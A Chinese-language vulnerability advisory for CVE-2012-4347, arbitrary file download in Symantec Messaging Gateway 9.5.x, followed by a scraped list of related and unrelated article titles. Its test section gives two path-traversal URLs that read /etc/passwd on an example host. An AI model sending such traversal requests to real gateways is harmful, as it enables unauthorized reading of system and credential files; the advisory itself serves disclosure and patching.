发布日期:2012-12-01

更新日期:2012-12-06

受影响系统:

Symantec Messaging Gateway 9.5.1

Symantec Messaging Gateway 9.5

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 56789

CVE(CAN) ID: CVE-2012-4347

Symantec Messaging Gateway是赛门铁克的电子邮件病毒保护软件。

Symantec Messaging Gateway 9.5.x存在多个任意文件下载漏洞,攻击者可利用这些漏洞在Web服务器上下载任意文件。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1

http://www.example.com/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd

建议:

--------------------------------------------------------------------------------

厂商补丁:

Symantec

--------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

symantec+linux+升级包,Symantec Messaging Gateway任意文件下载漏洞相关推荐

  1. symantec+linux+升级包,symantec 10版本升级及灾难性恢复过程

    一.如何将SAV 10.1升级到SAV 10.1.7.7000版本过程 ◆ 卸载SAV 10.1版的SSC系统控制台程序,重启计算机. ◆ 控制面板-添加删除程序-symantec system ce ...

  2. 任意文件下载漏洞知识点

    文章目录 资料下载 任意文件下载 漏洞描述 利用条件 漏洞危害 漏洞发现 链接上 参数上 案例 漏洞利用 利用原理 windows路径 linux路径 修复建议 摘抄 资料下载 点击 下载 https ...

  3. 目录遍历漏洞和任意文件下载漏洞

    目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件.配置文件等,攻击者利用该信息可以为进一步入侵网站做准备 ...

  4. 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十三)-任意文件下载漏洞(1)

    目录 前言: 一.任意文件下载 1.任意文件下载漏洞简介 1.1.简介 1.2.危害 1.3.利用 1.4.防范 2.项目配置 前言: 前面的博客记录了关于文件上传漏洞的基础知识,以及基本的漏洞出现点 ...

  5. 致远OA任意文件下载漏洞(CNVD-2020-62422)

    文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...

  6. (原创)浅谈任意文件下载漏洞的利用

    文章写的一般,如果有错误的地方,请指教~ 0x01 任意文件下载常见利用方式 0x02 信息收集部分 0x03 代码审计部分 0x04 总结 0x01 前言 在web语言中,php和java常常会产生 ...

  7. AVCON6 系统管理平台 download.action 任意文件下载漏洞

    漏洞描述: 华平信息技术股份有限公司是一家视讯产品与应用提供商,掌握视频处理.视音频编解码和网络适应性等.AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏 ...

  8. 金蝶协同办公平台任意文件下载漏洞(无需登录)

    经测试发现,该系统存在任意文件下载,且无需登录 存在漏洞的文件: /oa/admin/application/file_download.jsp?filePath=http://x.x.x.x:789 ...

  9. 大华城市安防监控系统平台管理存在任意文件下载漏洞

    大华城市安防监控系统平台管理存在任意文件下载漏洞 1.大华城市安防监控系统平台管理存在任意文件下载漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.FOFA 2.漏洞复现 2.1.登录页面 2.2.抓 ...

最新文章

  1. not optimal php,php环境配置 配置
  2. 如何删除一个员工编号及其全部主数据和事务数据?
  3. 开源实时音视频技术WebRTC中RTP/RTCP数据传输协议的应用
  4. 分布式服务框架原理(一)设计和实现
  5. win10 家庭版系统,创建用户(users\account\ 中,文件的「所有者」属性)
  6. linux下给源码安装好的php支持pdo_mysql
  7. android 好看的计算器,从未见过如此丑的计算器 – 计算管家 #Android
  8. 如何用卡片法写论文?
  9. 计算机到期收益率公式,用到期收益率计算债券价格
  10. 2012服务器系统有什么版本的,Windows server 2012操作系统有哪几个版本
  11. rabbitmq新增用户
  12. element上传多个视频/多个图片与限制数量
  13. SpringCloud版本选择
  14. 从微软的万物互联到腾讯的三网:当今世界就是一台计算机!
  15. 计蒜客 - 德克萨斯长角牛(最短路)
  16. 中秋节的特别礼物----属于程序员的专有浪漫
  17. 机顶盒显示该服务器未授权,户户通提示E04该频道未授权的解决办法
  18. python dash教程_开发者必备神器Dash使用教程
  19. 一加手机怎么root权限_一加手机OnePlus卡刷获取root权限图文教程
  20. Android流媒体开发之 自定义一个完备的log模块

热门文章

  1. 干货 | 实际操作中,以租代购产品应该如何设计?
  2. L2-036 网红点打卡攻略 (25 分)
  3. MacOS苹果电脑各种常见音频问题集锦
  4. 《第7讲 视觉里程计1 》上 7.1~7.6单目模型 读书笔记
  5. 计算机保密管理员工作总结,机要保密员岗位年终工作总结
  6. 什么是百分比堆积条形图?
  7. 最近收集的9000个英语单词
  8. 大白话说C++——“引用”是个啥?
  9. 经济危机期间,给老总的生日祝福语【搞笑】
  10. 微型计算机最早出现在1946年是对还是错,2016年计算机一级期末考试真题(含答案)...